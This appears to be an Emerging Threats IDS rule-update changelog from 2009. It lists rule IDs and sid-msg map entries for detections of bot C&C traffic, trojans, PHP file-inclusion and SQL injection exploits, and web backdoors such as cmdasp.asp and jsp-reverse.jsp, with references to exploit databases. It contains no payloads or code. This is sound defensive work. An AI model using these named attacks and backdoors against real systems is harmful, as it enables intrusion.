 2405007 - ET DROP Known Bot C&C Traffic (group 8) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405008 - ET DROP Known Bot C&C Traffic (group 9) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405009 - ET DROP Known Bot C&C Traffic (group 10) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405010 - ET DROP Known Bot C&C Traffic (group 11) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405011 - ET DROP Known Bot C&C Traffic (group 12) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405012 - ET DROP Known Bot C&C Traffic (group 13) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405013 - ET DROP Known Bot C&C Traffic (group 14) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405014 - ET DROP Known Bot C&C Traffic (group 15) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405015 - ET DROP Known Bot C&C Traffic (group 16) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405016 - ET DROP Known Bot C&C Traffic (group 17) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405017 - ET DROP Known Bot C&C Traffic (group 18) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405018 - ET DROP Known Bot C&C Traffic (group 19) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405019 - ET DROP Known Bot C&C Traffic (group 20) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405020 - ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405021 - ET DROP Known Bot C&C Traffic (group 22) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405022 - ET DROP Known Bot C&C Traffic (group 23) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
 2405023 - ET DROP Known Bot C&C Traffic (group 24) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)


[///]    Modified inactive rules:    [///]

 2001716 - ET WEB_SPECIFIC IDN url seen.. (emerging-web_sql_injection.rules)


[---]         Disabled rules:        [---]

 2009130 - ET TROJAN Overtoolbar.net Backdoor ICMP Checkin Request (emerging-virus.rules)
 2009131 - ET TROJAN Overtoolbar.net Backdoor ICMP Checkin Response (emerging-virus.rules)


[---]         Removed rules:         [---]

 2002035 - ET MALWARE Better Internet Spyware User Agent Activity (thin) (emerging-malware.rules)
 2002792 - ET TROJAN Win32.Agent Reporting User Activity (emerging-virus.rules)
 2002920 - ET POLICY VNC Authentication Failure (emerging-exploit.rules)
 2002922 - ET POLICY VNC Authentication Successful (emerging-exploit.rules)
 2003642 - ET TROJAN Downloader.Affill User Agent Detected (lol) (emerging-virus.rules)
 2008505 - ET MALWARE Adaware.BarACE Checkin and Update (emerging-virus.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-drop-BLOCK.rules (2):
        #  VERSION 1541
        #  Generated 2009-05-16 00:03:02 EDT

     -> Added to emerging-drop.rules (2):
        #  VERSION 1541
        #  Generated 2009-05-16 00:03:02 EDT

     -> Added to emerging-exploit.rules (2):
        #This is a good auth back from the server, in 2002922 in the policy ruleset
        #this is for a server saying auth failed, in 2002920 in the policy ruleset

     -> Added to emerging-policy.rules (1):
        #part of the state machine sigs in EXPLOIT/RealVNC

     -> Added to emerging-sid-msg.map (64):
        2001621 || ET WEB Exploit Suspected PHP Injection Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001621 || cve,2002-0953
        2001716 || ET WEB_SPECIFIC IDN url seen.. || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_IDN || url,doc.emergingthreats.net/2001716
        2001810 || ET WEB Explit PHP remote file include exploit attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001810
        2002838 || ET WEB_SPECIFIC Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html
        2002849 || ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509
        2003520 || ET WEB EXPLOIT webCalendar Remote File include || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_WebCalendar || url,doc.emergingthreats.net/2003520 || url,www.securityfocus.com/archive/1/462957
        2007611 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007611
        2007612 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007612
        2007613 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007613
        2007614 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007614
        2007950 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and Nome do Computador in Body || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007950
        2008142 || ET TROJAN Vapsup User-Agent (doshowmeanad loader v2.1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Vapsup || url,doc.emergingthreats.net/2008142
        2008189 || ET TROJAN SpamTool.Win32.Agent.gy/Grum/Tedroo Or Similar HTTP Checkin || url,securitylabs.websense.com/content/Blogs/2721.aspx || url,www.secureworks.com/research/threats/botnets2009/ || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools || url,doc.emergingthreats.net/2008189
        2008278 || ET TROJAN Generic Raider Obfuscated VBScript || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Raider_Obfuscated_VBS || url,doc.emergingthreats.net/2008278 || url,bbs.duba.net/viewthread.php?tid=21892104&page=1&extra=page=1
        2008379 || ET TROJAN Swizzor Checkin (kgen_up) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Lop || url,doc.emergingthreats.net/2008379
        2008973 || ET TROJAN onmuz.com Infection Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Onmuz.com || url,doc.emergingthreats.net/2008973
        2009126 || ET TROJAN Possible bot C&C Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009126
        2009156 || ET TROJAN Unknown Dropper Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Droppers_General || url,doc.emergingthreats.net/2009156 || url,www.virustotal.com/analisis/a4a854e56ecc0a54204fc3b043c63094
        2009306 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009306 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009307 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009307 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009308 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009308 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009309 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009309 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009310 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009310 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009311 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009311 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009312 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009312 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009313 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009313 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009314 || ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Orbit || url,doc.emergingthreats.net/2009314 || url,milw0rm.com/exploits/8257 || bugtraq,34200
        2009315 || ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PrecisionID || url,doc.emergingthreats.net/2009315 || url,securityfocus.com/archive/1/502319 || url,milw0rm.com/exploits/8332
        2009316 || ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_YapBB || url,doc.emergingthreats.net/2009316 || bugtraq,30686
        2009317 || ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DesktopOnNet || url,doc.emergingthreats.net/2009317 || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009318 || ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DesktopOnNet || url,doc.emergingthreats.net/2009318 || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009319 || ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DeZine || url,doc.emergingthreats.net/2009319 || url,milw0rm.com/exploits/7722 || bugtraq,33194
        2009320 || ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_rgboard || url,doc.emergingthreats.net/2009320 || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009321 || ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_rgboard || url,doc.emergingthreats.net/2009321 || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009322 || ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_SupportSoft || url,doc.emergingthreats.net/2009322 || url,milw0rm.com/exploits/8160 || bugtraq,34004
        2009323 || ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Demium || url,doc.emergingthreats.net/2009323 || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009324 || ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Demium || url,doc.emergingthreats.net/2009324 || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009325 || ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009325 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009326 || ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009326 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009327 || ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009327 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009328 || ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Geovision || url,doc.emergingthreats.net/2009328 || url,milw0rm.com/exploits/8206 || bugtraq,34115
        2009329 || ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Zabbix || url,doc.emergingthreats.net/2009329 || bugtraq,33965 || url,milw0rm.com/exploits/8140 || url,secunia.com/advisories/34091/
        2009330 || ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_MyForum || url,doc.emergingthreats.net/2009330 || url,milw0rm.com/exploits/6846 || url,vupen.com/english/advisories/2008/2938
        2009331 || ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_tinyCMS || url,doc.emergingthreats.net/2009331 || bugtraq,30785 || url,milw0rm.com/exploits/6287
        2009332 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ODARS || url,doc.emergingthreats.net/2009332 || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009333 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ODARS || url,doc.emergingthreats.net/2009333 || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009334 || ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Monrovia_Barcode || url,doc.emergingthreats.net/2009334 || bugtraq,23934 || url,milw0rm.com/exploits/8208
        2009335 || ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_NicLOR || url,doc.emergingthreats.net/2009335 || url,xforce.iss.net/xforce/xfdb/46330 || url,milw0rm.com/exploits/6982 || bugtraq,32112
        2009336 || ET WEB Possible Web Backdoor cfexec.cfm access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009336 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009337 || ET WEB Possible Web Backdoor cmdasp.asp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009337 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009338 || ET WEB Possible Web Backdoor cmdasp.aspx access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009338 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009339 || ET WEB Possible Web Backdoor simple-backdoor.php access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009339 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009340 || ET WEB Possible Web Backdoor php-backdoor.php access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009340 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009341 || ET WEB Possible Web Backdoor jsp-reverse.jsp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009341 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009342 || ET WEB Possible Web Backdoor perlcmd.cgi access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009342 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009343 || ET WEB Possible Web Backdoor cmdjsp.jsp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009343 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009344 || ET WEB Possible Web Backdoor cmd-asp-5.1.asp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009344 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009345 || ET ATTACK-RESPONSE HTTP 401 Unauthorized || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized || url,doc.emergingthreats.net/2009345
        2009346 || ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized || url,doc.emergingthreats.net/2009346
        2009347 || ET TROJAN Tigger.a/Syzor Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Tigger || url,doc.emergingthreats.net/2009347
        2009348 || ET CURRENT_EVENTS Inbound WorldPay Card Transaction Trojan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Worldpay || url,doc.emergingthreats.net/2009348 || url,www.sophos.com/blogs/gc/g/2009/05/07/worldpay-card-transactions-carry-malware-danger/
        2009349 || ET TROJAN Metafisher/Bzub/Cimuz/Tanspy Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bzub || url,doc.emergingthreats.net/2009349
        2009350 || ET TROJAN Win32.Hupigon Control Server Response || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Hupington || url,doc.emergingthreats.net/2009350
        2009351 || ET TROJAN Urlzone/Bebloh Communication with Controller || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bebloh || url,doc.emergingthreats.net/2009351 || url,threatinfo.trendmicro.com/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_BEBLOH.KO&VSect=Td

     -> Added to emerging-sid-msg.map.txt (64):
        2001621 || ET WEB Exploit Suspected PHP Injection Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001621 || cve,2002-0953
        2001716 || ET WEB_SPECIFIC IDN url seen.. || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_IDN || url,doc.emergingthreats.net/2001716
        2001810 || ET WEB Explit PHP remote file include exploit attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001810
        2002838 || ET WEB_SPECIFIC Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html
        2002849 || ET WEB_SPECIFIC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509
        2003520 || ET WEB EXPLOIT webCalendar Remote File include || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_WebCalendar || url,doc.emergingthreats.net/2003520 || url,www.securityfocus.com/archive/1/462957
        2007611 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007611
        2007612 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007612
        2007613 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007613
        2007614 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007614
        2007950 || ET TROJAN Possible Infection Report Mail - Indy Mail lib and Nome do Computador in Body || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007950
        2008142 || ET TROJAN Vapsup User-Agent (doshowmeanad loader v2.1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Vapsup || url,doc.emergingthreats.net/2008142
        2008189 || ET TROJAN SpamTool.Win32.Agent.gy/Grum/Tedroo Or Similar HTTP Checkin || url,securitylabs.websense.com/content/Blogs/2721.aspx || url,www.secureworks.com/research/threats/botnets2009/ || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools || url,doc.emergingthreats.net/2008189
        2008278 || ET TROJAN Generic Raider Obfuscated VBScript || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Raider_Obfuscated_VBS || url,doc.emergingthreats.net/2008278 || url,bbs.duba.net/viewthread.php?tid=21892104&page=1&extra=page=1
        2008379 || ET TROJAN Swizzor Checkin (kgen_up) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Lop || url,doc.emergingthreats.net/2008379
        2008973 || ET TROJAN onmuz.com Infection Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Onmuz.com || url,doc.emergingthreats.net/2008973
        2009126 || ET TROJAN Possible bot C&C Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009126
        2009156 || ET TROJAN Unknown Dropper Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Droppers_General || url,doc.emergingthreats.net/2009156 || url,www.virustotal.com/analisis/a4a854e56ecc0a54204fc3b043c63094
        2009306 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009306 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009307 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009307 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009308 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009308 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009309 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009309 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009310 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009310 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009311 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009311 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009312 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009312 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009313 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_WeBid || url,doc.emergingthreats.net/2009313 || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009314 || ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Orbit || url,doc.emergingthreats.net/2009314 || url,milw0rm.com/exploits/8257 || bugtraq,34200
        2009315 || ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PrecisionID || url,doc.emergingthreats.net/2009315 || url,securityfocus.com/archive/1/502319 || url,milw0rm.com/exploits/8332
        2009316 || ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_YapBB || url,doc.emergingthreats.net/2009316 || bugtraq,30686
        2009317 || ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DesktopOnNet || url,doc.emergingthreats.net/2009317 || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009318 || ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DesktopOnNet || url,doc.emergingthreats.net/2009318 || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009319 || ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_DeZine || url,doc.emergingthreats.net/2009319 || url,milw0rm.com/exploits/7722 || bugtraq,33194
